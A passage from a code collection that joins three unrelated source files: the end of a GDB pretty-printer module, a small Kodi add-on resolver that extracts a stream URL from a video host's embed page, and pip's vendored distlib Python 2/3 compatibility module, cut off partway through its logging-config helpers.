                    raise RuntimeError("pretty-printer already registered: %s" %
                                       printer.name)
            i = i + 1

    obj.pretty_printers.insert(0, printer)
class RegexpCollectionPrettyPrinter(PrettyPrinter):
    """Class for implementing a collection of regular-expression based pretty-printers.

    Intended usage:

    pretty_printer = RegexpCollectionPrettyPrinter("my_library")
    pretty_printer.add_printer("myclass1", "^myclass1$", MyClass1Printer)
    ...
    pretty_printer.add_printer("myclassN", "^myclassN$", MyClassNPrinter)
    register_pretty_printer(obj, pretty_printer)
    """

    class RegexpSubprinter(SubPrettyPrinter):
        def __init__(self, name, regexp, gen_printer):
            super(RegexpCollectionPrettyPrinter.RegexpSubprinter,
                  self).__init__(name)
            self.gen_printer = gen_printer
            self.regexp = regexp
            # Compile up front; __call__ may run for every printed value.
            self.compiled_re = re.compile(regexp)

    def __init__(self, name):
        super(RegexpCollectionPrettyPrinter, self).__init__(name, [])

    def add_printer(self, name, regexp, gen_printer):
        """Append a subprinter to the collection.

        Arguments:
            name: The name of the subprinter.
            regexp: The regular expression, as a string.
            gen_printer: A function/method that given a value returns an
                object to pretty-print it.

        Returns:
            Nothing.
        """
        # The name is deliberately distinct from the regexp: the
        # enable/disable commands themselves take a regexp, and a regexp of
        # a regexp would be awkward.
        self.subprinters.append(
            self.RegexpSubprinter(name, regexp, gen_printer))

    def __call__(self, val):
        """Lookup the pretty-printer for the provided value."""
        typename = gdb.types.get_basic_type(val.type).tag
        if not typename:
            return None

        # Instantiate the first enabled subprinter whose regexp matches
        # this type name.
        for subprinter in self.subprinters:
            if subprinter.enabled and subprinter.compiled_re.search(typename):
                return subprinter.gen_printer(val)

        # No printer registered for this type.
        return None
# A helper class for printing enum types. This class is instantiated
# with a list of enumerators to print a particular Value.
class _EnumInstance:
    """Renders a flag-enum Value as "0x%x [A | B | ...]" from its
    (name, value) enumerator pairs."""

    def __init__(self, enumerators, val):
        self.enumerators = enumerators
        self.val = val

    def to_string(self):
        names = []
        remaining = long(self.val)
        matched = False
        for (e_name, e_value) in self.enumerators:
            if remaining & e_value:
                names.append(e_name)
                remaining &= ~e_value
                matched = True
        if not matched or remaining != 0:
            # Bits not covered by any enumerator.
            names.append('<unknown: 0x%x>' % remaining)
        return "0x%x [%s]" % (self.val, " | ".join(names))
class FlagEnumerationPrinter(PrettyPrinter):
    """A pretty-printer which can be used to print a flag-style enumeration.
    A flag-style enumeration is one where the enumerators are or'd
    together to create values.  The new printer will print these
    symbolically using '|' notation.  The printer must be registered
    manually.  This printer is most useful when an enum is flag-like,
    but has some overlap.  GDB's built-in printing will not handle
    this case, but this printer will attempt to."""

    def __init__(self, enum_type):
        super(FlagEnumerationPrinter, self).__init__(enum_type)
        self.initialized = False

    def __call__(self, val):
        # Lazily resolve the enum's fields the first time a value of this
        # type is printed.
        if not self.initialized:
            self.initialized = True
            flags = gdb.lookup_type(self.name)
            self.enumerators = []
            for field in flags.fields():
                self.enumerators.append((field.name, field.enumval))
            # Sorting the enumerators by value usually does the right
            # thing.  Bug fix: the list elements are (name, value) tuples,
            # so sort on index 1; the old key `lambda x: x.enumval` raised
            # AttributeError on every call.
            self.enumerators.sort(key=lambda x: x[1])

        if self.enabled:
            return _EnumInstance(self.enumerators, val)
        else:
            return None
| gpl-2.0 |
mrknow/filmkodi | plugin.video.fanfilm/resources/lib/resolvers/realvid.py | 2 | 1129 | # -*- coding: utf-8 -*-
'''
FanFilm Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
def resolve(url):
    """Resolve a realvid.net page/embed URL to a direct stream URL.

    Returns the stream URL, or None when the id cannot be parsed or the
    page layout has changed (best-effort, like the sibling resolvers).
    """
    try:
        url = url.replace('/embed-', '/')
        video_id = re.compile('//.+?/([\w]+)').findall(url)[0]
        url = 'http://realvid.net/embed-%s.html' % video_id

        result = client.request(url)

        # The last file:"..." entry on the page is the actual stream.
        return re.compile('file *: *"(http.+?)"').findall(result)[-1]
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any scrape failure still yields None.
        return None
| apache-2.0 |
sursum/buckanjaren | buckanjaren/lib/python3.5/site-packages/pip/_vendor/distlib/compat.py | 335 | 40801 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import absolute_import
import os
import re
import sys
# Optional ssl support; `ssl` stays None when the interpreter was built
# without it, and the HTTPS handlers below are then skipped.
try:
    import ssl
except ImportError:
    ssl = None

# Unify the Python 2 and Python 3 stdlib namespaces under common names so
# the rest of distlib can import everything from this module.
if sys.version_info[0] < 3:  # pragma: no cover
    from StringIO import StringIO
    string_types = basestring,
    text_type = unicode
    from types import FileType as file_type
    import __builtin__ as builtins
    import ConfigParser as configparser
    from ._backport import shutil
    from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit
    from urllib import (urlretrieve, quote as _quote, unquote, url2pathname,
                        pathname2url, ContentTooShortError, splittype)

    def quote(s):
        # Match Python 3's quote(): percent-encode text as UTF-8.
        if isinstance(s, unicode):
            s = s.encode('utf-8')
        return _quote(s)

    import urllib2
    from urllib2 import (Request, urlopen, URLError, HTTPError,
                         HTTPBasicAuthHandler, HTTPPasswordMgr,
                         HTTPHandler, HTTPRedirectHandler,
                         build_opener)
    if ssl:
        from urllib2 import HTTPSHandler
    import httplib
    import xmlrpclib
    import Queue as queue
    from HTMLParser import HTMLParser
    import htmlentitydefs
    raw_input = raw_input
    from itertools import ifilter as filter
    from itertools import ifilterfalse as filterfalse

    _userprog = None
    def splituser(host):
        """splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]'."""
        global _userprog
        # Compile the pattern lazily, once.
        if _userprog is None:
            import re
            _userprog = re.compile('^(.*)@(.*)$')

        match = _userprog.match(host)
        if match: return match.group(1, 2)
        return None, host

else:  # pragma: no cover
    from io import StringIO
    string_types = str,
    text_type = str
    from io import TextIOWrapper as file_type
    import builtins
    import configparser
    import shutil
    from urllib.parse import (urlparse, urlunparse, urljoin, splituser, quote,
                              unquote, urlsplit, urlunsplit, splittype)
    from urllib.request import (urlopen, urlretrieve, Request, url2pathname,
                                pathname2url,
                                HTTPBasicAuthHandler, HTTPPasswordMgr,
                                HTTPHandler, HTTPRedirectHandler,
                                build_opener)
    if ssl:
        from urllib.request import HTTPSHandler
    from urllib.error import HTTPError, URLError, ContentTooShortError
    import http.client as httplib
    import urllib.request as urllib2
    import xmlrpc.client as xmlrpclib
    import queue
    from html.parser import HTMLParser
    import html.entities as htmlentitydefs
    raw_input = input
    from itertools import filterfalse
    filter = filter
# Backport of ssl.match_hostname / CertificateError for interpreters whose
# ssl module does not provide them.
try:
    from ssl import match_hostname, CertificateError
except ImportError: # pragma: no cover
    class CertificateError(ValueError):
        pass

    def _dnsname_match(dn, hostname, max_wildcards=1):
        """Matching according to RFC 6125, section 6.4.3

        http://tools.ietf.org/html/rfc6125#section-6.4.3
        """
        pats = []
        if not dn:
            return False

        parts = dn.split('.')
        leftmost, remainder = parts[0], parts[1:]

        wildcards = leftmost.count('*')
        if wildcards > max_wildcards:
            # Issue #17980: avoid denials of service by refusing more
            # than one wildcard per fragment.  A survey of established
            # policy among SSL implementations showed it to be a
            # reasonable choice.
            raise CertificateError(
                "too many wildcards in certificate DNS name: " + repr(dn))

        # speed up common case w/o wildcards
        if not wildcards:
            return dn.lower() == hostname.lower()

        # RFC 6125, section 6.4.3, subitem 1.
        # The client SHOULD NOT attempt to match a presented identifier in which
        # the wildcard character comprises a label other than the left-most label.
        if leftmost == '*':
            # When '*' is a fragment by itself, it matches a non-empty dotless
            # fragment.
            pats.append('[^.]+')
        elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
            # RFC 6125, section 6.4.3, subitem 3.
            # The client SHOULD NOT attempt to match a presented identifier
            # where the wildcard character is embedded within an A-label or
            # U-label of an internationalized domain name.
            pats.append(re.escape(leftmost))
        else:
            # Otherwise, '*' matches any dotless string, e.g. www*
            pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))

        # add the remaining fragments, ignore any wildcards
        for frag in remainder:
            pats.append(re.escape(frag))

        pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
        return pat.match(hostname)

    def match_hostname(cert, hostname):
        """Verify that *cert* (in decoded format as returned by
        SSLSocket.getpeercert()) matches the *hostname*.  RFC 2818 and RFC 6125
        rules are followed, but IP addresses are not accepted for *hostname*.

        CertificateError is raised on failure. On success, the function
        returns nothing.
        """
        if not cert:
            raise ValueError("empty or no certificate, match_hostname needs a "
                             "SSL socket or SSL context with either "
                             "CERT_OPTIONAL or CERT_REQUIRED")
        dnsnames = []
        san = cert.get('subjectAltName', ())
        for key, value in san:
            if key == 'DNS':
                if _dnsname_match(value, hostname):
                    return
                dnsnames.append(value)
        if not dnsnames:
            # The subject is only checked when there is no dNSName entry
            # in subjectAltName
            for sub in cert.get('subject', ()):
                for key, value in sub:
                    # XXX according to RFC 2818, the most specific Common Name
                    # must be used.
                    if key == 'commonName':
                        if _dnsname_match(value, hostname):
                            return
                        dnsnames.append(value)
        if len(dnsnames) > 1:
            raise CertificateError("hostname %r "
                                   "doesn't match either of %s"
                                   % (hostname, ', '.join(map(repr, dnsnames))))
        elif len(dnsnames) == 1:
            raise CertificateError("hostname %r "
                                   "doesn't match %r"
                                   % (hostname, dnsnames[0]))
        else:
            raise CertificateError("no appropriate commonName or "
                                   "subjectAltName fields were found")
try:
    from types import SimpleNamespace as Container
except ImportError:  # pragma: no cover
    class Container(object):
        """
        A generic container for when multiple values need to be returned
        """
        def __init__(self, **kwargs):
            for key, value in kwargs.items():
                setattr(self, key, value)
try:
    from shutil import which
except ImportError: # pragma: no cover
    # Implementation from Python 3.3
    def which(cmd, mode=os.F_OK | os.X_OK, path=None):
        """Given a command, mode, and a PATH string, return the path which
        conforms to the given mode on the PATH, or None if there is no such
        file.

        `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
        of os.environ.get("PATH"), or can be overridden with a custom search
        path.
        """
        # Check that a given file can be accessed with the correct mode.
        # Additionally check that `file` is not a directory, as on Windows
        # directories pass the os.access check.
        def _access_check(fn, mode):
            return (os.path.exists(fn) and os.access(fn, mode)
                    and not os.path.isdir(fn))

        # If we're given a path with a directory part, look it up directly rather
        # than referring to PATH directories. This includes checking relative to the
        # current directory, e.g. ./script
        if os.path.dirname(cmd):
            if _access_check(cmd, mode):
                return cmd
            return None

        if path is None:
            path = os.environ.get("PATH", os.defpath)
        if not path:
            return None
        path = path.split(os.pathsep)

        if sys.platform == "win32":
            # The current directory takes precedence on Windows.
            if not os.curdir in path:
                path.insert(0, os.curdir)

            # PATHEXT is necessary to check on Windows.
            pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
            # See if the given file matches any of the expected path extensions.
            # This will allow us to short circuit when given "python.exe".
            # If it does match, only test that one, otherwise we have to try
            # others.
            if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
                files = [cmd]
            else:
                files = [cmd + ext for ext in pathext]
        else:
            # On other platforms you don't have things like PATHEXT to tell you
            # what file suffixes are executable, so just pass on cmd as-is.
            files = [cmd]

        # Search PATH left to right, skipping duplicate directories
        # (normalized case so Windows duplicates collapse too).
        seen = set()
        for dir in path:
            normdir = os.path.normcase(dir)
            if not normdir in seen:
                seen.add(normdir)
                for thefile in files:
                    name = os.path.join(dir, thefile)
                    if _access_check(name, mode):
                        return name
        return None
# ZipFile is a context manager in 2.7, but not in 2.6
from zipfile import ZipFile as BaseZipFile

if hasattr(BaseZipFile, '__enter__'): # pragma: no cover
    ZipFile = BaseZipFile
else:
    from zipfile import ZipExtFile as BaseZipExtFile

    class ZipExtFile(BaseZipExtFile):
        # Wraps an existing ZipExtFile (copying its state) so archive
        # members can also be used as context managers.
        def __init__(self, base):
            self.__dict__.update(base.__dict__)

        def __enter__(self):
            return self

        def __exit__(self, *exc_info):
            self.close()
            # return None, so if an exception occurred, it will propagate

    class ZipFile(BaseZipFile):
        def __enter__(self):
            return self

        def __exit__(self, *exc_info):
            self.close()
            # return None, so if an exception occurred, it will propagate

        def open(self, *args, **kwargs):
            # Rewrap the returned member so it is a context manager too.
            base = BaseZipFile.open(self, *args, **kwargs)
            return ZipExtFile(base)
try:
    from platform import python_implementation
except ImportError: # pragma: no cover
    def python_implementation():
        """Return a string identifying the Python implementation."""
        version = sys.version
        if 'PyPy' in version:
            return 'PyPy'
        if os.name == 'java':
            return 'Jython'
        if version.startswith('IronPython'):
            return 'IronPython'
        return 'CPython'
# sysconfig appeared in 2.7/3.2; older interpreters use the bundled backport.
try:
    import sysconfig
except ImportError: # pragma: no cover
    from ._backport import sysconfig

# callable() was removed in 3.0/3.1; emulate it via collections.Callable.
try:
    callable = callable
except NameError: # pragma: no cover
    from collections import Callable

    def callable(obj):
        return isinstance(obj, Callable)

# os.fsencode/os.fsdecode are Python 3 only; emulate them on Python 2
# using the filesystem encoding.
try:
    fsencode = os.fsencode
    fsdecode = os.fsdecode
except AttributeError: # pragma: no cover
    _fsencoding = sys.getfilesystemencoding()
    if _fsencoding == 'mbcs':
        _fserrors = 'strict'
    else:
        _fserrors = 'surrogateescape'

    def fsencode(filename):
        if isinstance(filename, bytes):
            return filename
        elif isinstance(filename, text_type):
            return filename.encode(_fsencoding, _fserrors)
        else:
            raise TypeError("expect bytes or str, not %s" %
                            type(filename).__name__)

    def fsdecode(filename):
        if isinstance(filename, text_type):
            return filename
        elif isinstance(filename, bytes):
            return filename.decode(_fsencoding, _fserrors)
        else:
            raise TypeError("expect bytes or str, not %s" %
                            type(filename).__name__)
try:
    from tokenize import detect_encoding
except ImportError: # pragma: no cover
    from codecs import BOM_UTF8, lookup
    import re

    # NOTE(review): not a raw string; '\s'/'\w' only work because unknown
    # escapes pass through unchanged (deprecated in newer Pythons).
    cookie_re = re.compile("coding[:=]\s*([-\w.]+)")

    def _get_normal_name(orig_enc):
        """Imitates get_normal_name in tokenizer.c."""
        # Only care about the first 12 characters.
        enc = orig_enc[:12].lower().replace("_", "-")
        if enc == "utf-8" or enc.startswith("utf-8-"):
            return "utf-8"
        if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or \
           enc.startswith(("latin-1-", "iso-8859-1-", "iso-latin-1-")):
            return "iso-8859-1"
        return orig_enc

    def detect_encoding(readline):
        """
        The detect_encoding() function is used to detect the encoding that should
        be used to decode a Python source file.  It requires one argument, readline,
        in the same way as the tokenize() generator.

        It will call readline a maximum of twice, and return the encoding used
        (as a string) and a list of any lines (left as bytes) it has read in.

        It detects the encoding from the presence of a utf-8 bom or an encoding
        cookie as specified in pep-0263.  If both a bom and a cookie are present,
        but disagree, a SyntaxError will be raised.  If the encoding cookie is an
        invalid charset, raise a SyntaxError.  Note that if a utf-8 bom is found,
        'utf-8-sig' is returned.

        If no encoding is specified, then the default of 'utf-8' will be returned.
        """
        try:
            filename = readline.__self__.name
        except AttributeError:
            filename = None
        bom_found = False
        encoding = None
        default = 'utf-8'

        def read_or_stop():
            try:
                return readline()
            except StopIteration:
                return b''

        def find_cookie(line):
            try:
                # Decode as UTF-8. Either the line is an encoding declaration,
                # in which case it should be pure ASCII, or it must be UTF-8
                # per default encoding.
                line_string = line.decode('utf-8')
            except UnicodeDecodeError:
                msg = "invalid or missing encoding declaration"
                if filename is not None:
                    msg = '{} for {!r}'.format(msg, filename)
                raise SyntaxError(msg)

            matches = cookie_re.findall(line_string)
            if not matches:
                return None
            encoding = _get_normal_name(matches[0])
            try:
                codec = lookup(encoding)
            except LookupError:
                # This behaviour mimics the Python interpreter
                if filename is None:
                    msg = "unknown encoding: " + encoding
                else:
                    msg = "unknown encoding for {!r}: {}".format(filename,
                                                                 encoding)
                raise SyntaxError(msg)

            if bom_found:
                if codec.name != 'utf-8':
                    # This behaviour mimics the Python interpreter
                    if filename is None:
                        msg = 'encoding problem: utf-8'
                    else:
                        msg = 'encoding problem for {!r}: utf-8'.format(filename)
                    raise SyntaxError(msg)
                encoding += '-sig'
            return encoding

        first = read_or_stop()
        if first.startswith(BOM_UTF8):
            bom_found = True
            first = first[3:]
            default = 'utf-8-sig'
        if not first:
            return default, []

        encoding = find_cookie(first)
        if encoding:
            return encoding, [first]

        second = read_or_stop()
        if not second:
            return default, [first]

        encoding = find_cookie(second)
        if encoding:
            return encoding, [first, second]

        return default, [first, second]
# For converting & <-> &amp; etc.
try:
    from html import escape
except ImportError:
    from cgi import escape
if sys.version_info[:2] < (3, 4):
    # html.unescape() was added in 3.4; fall back to HTMLParser's method.
    unescape = HTMLParser().unescape
else:
    from html import unescape
try:
    from collections import ChainMap
except ImportError: # pragma: no cover
    # Backport of collections.ChainMap for Python < 3.3.
    from collections import MutableMapping

    try:
        from reprlib import recursive_repr as _recursive_repr
    except ImportError:
        def _recursive_repr(fillvalue='...'):
            '''
            Decorator to make a repr function return fillvalue for a recursive
            call
            '''

            def decorating_function(user_function):
                repr_running = set()

                def wrapper(self):
                    # NOTE(review): get_ident is not imported in this branch;
                    # presumably provided elsewhere — confirm before relying
                    # on this fallback path.
                    key = id(self), get_ident()
                    if key in repr_running:
                        return fillvalue
                    repr_running.add(key)
                    try:
                        result = user_function(self)
                    finally:
                        repr_running.discard(key)
                    return result

                # Can't use functools.wraps() here because of bootstrap issues
                wrapper.__module__ = getattr(user_function, '__module__')
                wrapper.__doc__ = getattr(user_function, '__doc__')
                wrapper.__name__ = getattr(user_function, '__name__')
                wrapper.__annotations__ = getattr(user_function, '__annotations__', {})
                return wrapper

            return decorating_function

    class ChainMap(MutableMapping):
        ''' A ChainMap groups multiple dicts (or other mappings) together
        to create a single, updateable view.

        The underlying mappings are stored in a list.  That list is public and can
        accessed or updated using the *maps* attribute.  There is no other state.

        Lookups search the underlying mappings successively until a key is found.
        In contrast, writes, updates, and deletions only operate on the first
        mapping.
        '''

        def __init__(self, *maps):
            '''Initialize a ChainMap by setting *maps* to the given mappings.
            If no mappings are provided, a single empty dictionary is used.
            '''
            self.maps = list(maps) or [{}]          # always at least one map

        def __missing__(self, key):
            raise KeyError(key)

        def __getitem__(self, key):
            for mapping in self.maps:
                try:
                    return mapping[key]             # can't use 'key in mapping' with defaultdict
                except KeyError:
                    pass
            return self.__missing__(key)            # support subclasses that define __missing__

        def get(self, key, default=None):
            return self[key] if key in self else default

        def __len__(self):
            return len(set().union(*self.maps))     # reuses stored hash values if possible

        def __iter__(self):
            return iter(set().union(*self.maps))

        def __contains__(self, key):
            return any(key in m for m in self.maps)

        def __bool__(self):
            return any(self.maps)

        @_recursive_repr()
        def __repr__(self):
            return '{0.__class__.__name__}({1})'.format(
                self, ', '.join(map(repr, self.maps)))

        @classmethod
        def fromkeys(cls, iterable, *args):
            'Create a ChainMap with a single dict created from the iterable.'
            return cls(dict.fromkeys(iterable, *args))

        def copy(self):
            'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
            return self.__class__(self.maps[0].copy(), *self.maps[1:])

        __copy__ = copy

        def new_child(self):                        # like Django's Context.push()
            'New ChainMap with a new dict followed by all previous maps.'
            return self.__class__({}, *self.maps)

        @property
        def parents(self):                          # like Django's Context.pop()
            'New ChainMap from maps[1:].'
            return self.__class__(*self.maps[1:])

        def __setitem__(self, key, value):
            self.maps[0][key] = value

        def __delitem__(self, key):
            try:
                del self.maps[0][key]
            except KeyError:
                raise KeyError('Key not found in the first mapping: {!r}'.format(key))

        def popitem(self):
            'Remove and return an item pair from maps[0]. Raise KeyError is maps[0] is empty.'
            try:
                return self.maps[0].popitem()
            except KeyError:
                raise KeyError('No keys found in the first mapping.')

        def pop(self, key, *args):
            'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
            try:
                return self.maps[0].pop(key, *args)
            except KeyError:
                raise KeyError('Key not found in the first mapping: {!r}'.format(key))

        def clear(self):
            'Clear maps[0], leaving maps[1:] intact.'
            self.maps[0].clear()
try:
    from imp import cache_from_source
except ImportError: # pragma: no cover
    # Rough pre-PEP-3147 approximation for interpreters without imp:
    # foo.py -> foo.pyc (or foo.pyo when running optimized).
    def cache_from_source(path, debug_override=None):
        assert path.endswith('.py')
        if debug_override is None:
            debug_override = __debug__
        if debug_override:
            suffix = 'c'
        else:
            suffix = 'o'
        return path + suffix
# Use the C-accelerated stdlib OrderedDict when available; otherwise fall
# back to the pure-Python backport below (ActiveState recipe 576693).
try:
    from collections import OrderedDict
except ImportError: # pragma: no cover
    ## {{{ http://code.activestate.com/recipes/576693/ (r9)
    # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
    # Passes Python2.7's test suite and incorporates all the latest updates.
    try:
        from thread import get_ident as _get_ident
    except ImportError:
        from dummy_thread import get_ident as _get_ident
    try:
        from _abcoll import KeysView, ValuesView, ItemsView
    except ImportError:
        # Without _abcoll, viewkeys/viewvalues/viewitems below will raise
        # NameError if called; everything else keeps working.
        pass
    class OrderedDict(dict):
        'Dictionary that remembers insertion order'
        # An inherited dict maps keys to values.
        # The inherited dict provides __getitem__, __len__, __contains__, and get.
        # The remaining methods are order-aware.
        # Big-O running times for all methods are the same as for regular dictionaries.
        # The internal self.__map dictionary maps keys to links in a doubly linked list.
        # The circular doubly linked list starts and ends with a sentinel element.
        # The sentinel element never gets deleted (this simplifies the algorithm).
        # Each link is stored as a list of length three: [PREV, NEXT, KEY].
        def __init__(self, *args, **kwds):
            '''Initialize an ordered dictionary. Signature is the same as for
            regular dictionaries, but keyword arguments are not recommended
            because their insertion order is arbitrary.
            '''
            if len(args) > 1:
                raise TypeError('expected at most 1 arguments, got %d' % len(args))
            # The try/except keeps re-initialization (e.g. od.__init__(...) on
            # an existing instance) from discarding the current order.
            try:
                self.__root
            except AttributeError:
                self.__root = root = [] # sentinel node
                root[:] = [root, root, None]
                self.__map = {}
            self.__update(*args, **kwds)
        def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
            'od.__setitem__(i, y) <==> od[i]=y'
            # Setting a new item creates a new link which goes at the end of the linked
            # list, and the inherited dictionary is updated with the new key/value pair.
            if key not in self:
                root = self.__root
                last = root[0]
                last[1] = root[0] = self.__map[key] = [last, root, key]
            dict_setitem(self, key, value)
        def __delitem__(self, key, dict_delitem=dict.__delitem__):
            'od.__delitem__(y) <==> del od[y]'
            # Deleting an existing item uses self.__map to find the link which is
            # then removed by updating the links in the predecessor and successor nodes.
            dict_delitem(self, key)
            link_prev, link_next, key = self.__map.pop(key)
            link_prev[1] = link_next
            link_next[0] = link_prev
        def __iter__(self):
            'od.__iter__() <==> iter(od)'
            # Traverse the linked list forwards, starting just after the sentinel.
            root = self.__root
            curr = root[1]
            while curr is not root:
                yield curr[2]
                curr = curr[1]
        def __reversed__(self):
            'od.__reversed__() <==> reversed(od)'
            root = self.__root
            curr = root[0]
            while curr is not root:
                yield curr[2]
                curr = curr[0]
        def clear(self):
            'od.clear() -> None. Remove all items from od.'
            # Break the link cycles first so reference counting can reclaim
            # the nodes promptly; AttributeError means __map was never set.
            try:
                for node in self.__map.itervalues():
                    del node[:]
                root = self.__root
                root[:] = [root, root, None]
                self.__map.clear()
            except AttributeError:
                pass
            dict.clear(self)
        def popitem(self, last=True):
            '''od.popitem() -> (k, v), return and remove a (key, value) pair.
            Pairs are returned in LIFO order if last is true or FIFO order if false.
            '''
            if not self:
                raise KeyError('dictionary is empty')
            root = self.__root
            if last:
                link = root[0]
                link_prev = link[0]
                link_prev[1] = root
                root[0] = link_prev
            else:
                link = root[1]
                link_next = link[1]
                root[1] = link_next
                link_next[0] = root
            key = link[2]
            del self.__map[key]
            value = dict.pop(self, key)
            return key, value
        # -- the following methods do not depend on the internal structure --
        def keys(self):
            'od.keys() -> list of keys in od'
            return list(self)
        def values(self):
            'od.values() -> list of values in od'
            return [self[key] for key in self]
        def items(self):
            'od.items() -> list of (key, value) pairs in od'
            return [(key, self[key]) for key in self]
        def iterkeys(self):
            'od.iterkeys() -> an iterator over the keys in od'
            return iter(self)
        def itervalues(self):
            'od.itervalues -> an iterator over the values in od'
            for k in self:
                yield self[k]
        def iteritems(self):
            'od.iteritems -> an iterator over the (key, value) items in od'
            for k in self:
                yield (k, self[k])
        def update(*args, **kwds):
            '''od.update(E, **F) -> None. Update od from dict/iterable E and F.
            If E is a dict instance, does: for k in E: od[k] = E[k]
            If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
            Or if E is an iterable of items, does: for k, v in E: od[k] = v
            In either case, this is followed by: for k, v in F.items(): od[k] = v
            '''
            # Declared with bare *args so that keys literally named 'self' or
            # 'other' can still be passed as keyword arguments.
            if len(args) > 2:
                raise TypeError('update() takes at most 2 positional '
                                'arguments (%d given)' % (len(args),))
            elif not args:
                raise TypeError('update() takes at least 1 argument (0 given)')
            self = args[0]
            # Make progressively weaker assumptions about "other"
            other = ()
            if len(args) == 2:
                other = args[1]
            if isinstance(other, dict):
                for key in other:
                    self[key] = other[key]
            elif hasattr(other, 'keys'):
                for key in other.keys():
                    self[key] = other[key]
            else:
                for key, value in other:
                    self[key] = value
            for key, value in kwds.items():
                self[key] = value
        __update = update # let subclasses override update without breaking __init__
        # Sentinel distinguishing "no default supplied" from default=None.
        __marker = object()
        def pop(self, key, default=__marker):
            '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
            If key is not found, d is returned if given, otherwise KeyError is raised.
            '''
            if key in self:
                result = self[key]
                del self[key]
                return result
            if default is self.__marker:
                raise KeyError(key)
            return default
        def setdefault(self, key, default=None):
            'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
            if key in self:
                return self[key]
            self[key] = default
            return default
        def __repr__(self, _repr_running=None):
            'od.__repr__() <==> repr(od)'
            if not _repr_running: _repr_running = {}
            # Guard against infinite recursion when the dict contains itself;
            # the guard is keyed per (object, thread) so threads don't collide.
            call_key = id(self), _get_ident()
            if call_key in _repr_running:
                return '...'
            _repr_running[call_key] = 1
            try:
                if not self:
                    return '%s()' % (self.__class__.__name__,)
                return '%s(%r)' % (self.__class__.__name__, self.items())
            finally:
                del _repr_running[call_key]
        def __reduce__(self):
            'Return state information for pickling'
            items = [[k, self[k]] for k in self]
            inst_dict = vars(self).copy()
            for k in vars(OrderedDict()):
                inst_dict.pop(k, None)
            if inst_dict:
                return (self.__class__, (items,), inst_dict)
            return self.__class__, (items,)
        def copy(self):
            'od.copy() -> a shallow copy of od'
            return self.__class__(self)
        @classmethod
        def fromkeys(cls, iterable, value=None):
            '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
            and values equal to v (which defaults to None).
            '''
            d = cls()
            for key in iterable:
                d[key] = value
            return d
        def __eq__(self, other):
            '''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
            while comparison to a regular mapping is order-insensitive.
            '''
            if isinstance(other, OrderedDict):
                return len(self)==len(other) and self.items() == other.items()
            return dict.__eq__(self, other)
        def __ne__(self, other):
            return not self == other
        # -- the following methods are only used in Python 2.7 --
        def viewkeys(self):
            "od.viewkeys() -> a set-like object providing a view on od's keys"
            return KeysView(self)
        def viewvalues(self):
            "od.viewvalues() -> an object providing a view on od's values"
            return ValuesView(self)
        def viewitems(self):
            "od.viewitems() -> a set-like object providing a view on od's items"
            return ItemsView(self)
# Reuse the stdlib logging.config helpers when present; otherwise provide a
# minimal valid_ident (plus the Converting*/BaseConfigurator classes below).
try:
    from logging.config import BaseConfigurator, valid_ident
except ImportError: # pragma: no cover
    # ASCII identifier check, case-insensitive; relies on a module-level
    # `import re` (not visible in this chunk) -- TODO confirm.
    IDENTIFIER = re.compile('^[a-z_][a-z0-9_]*$', re.I)
    def valid_ident(s):
        # Return True if *s* looks like a Python identifier; raise ValueError
        # otherwise (never returns False).
        m = IDENTIFIER.match(s)
        if not m:
            raise ValueError('Not a valid Python identifier: %r' % s)
        return True
# The ConvertingXXX classes are wrappers around standard Python containers,
# and they serve to convert any suitable values in the container. The
# conversion converts base dicts, lists and tuples to their wrapped
# equivalents, whereas strings which match a conversion format are converted
# appropriately.
#
# Each wrapper should have a configurator attribute holding the actual
# configurator to use for conversion.
    class ConvertingDict(dict):
        """A converting dictionary wrapper."""
        # NOTE: callers must assign a `configurator` attribute (a
        # BaseConfigurator) before items are accessed.
        def __getitem__(self, key):
            value = dict.__getitem__(self, key)
            result = self.configurator.convert(value)
            #If the converted value is different, save for next time
            if value is not result:
                self[key] = result
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    # Record where the converted container lives so nested
                    # conversions can find their way back up.
                    result.parent = self
                    result.key = key
            return result
        def get(self, key, default=None):
            value = dict.get(self, key, default)
            result = self.configurator.convert(value)
            #If the converted value is different, save for next time
            if value is not result:
                self[key] = result
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    result.parent = self
                    result.key = key
            return result
        def pop(self, key, default=None):
            value = dict.pop(self, key, default)
            result = self.configurator.convert(value)
            # The key is gone, so nothing is written back here; only the
            # parent/key back-references are set on converted containers.
            if value is not result:
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    result.parent = self
                    result.key = key
            return result
    class ConvertingList(list):
        """A converting list wrapper."""
        # Same contract as ConvertingDict: a `configurator` attribute must be
        # assigned before element access.
        def __getitem__(self, key):
            value = list.__getitem__(self, key)
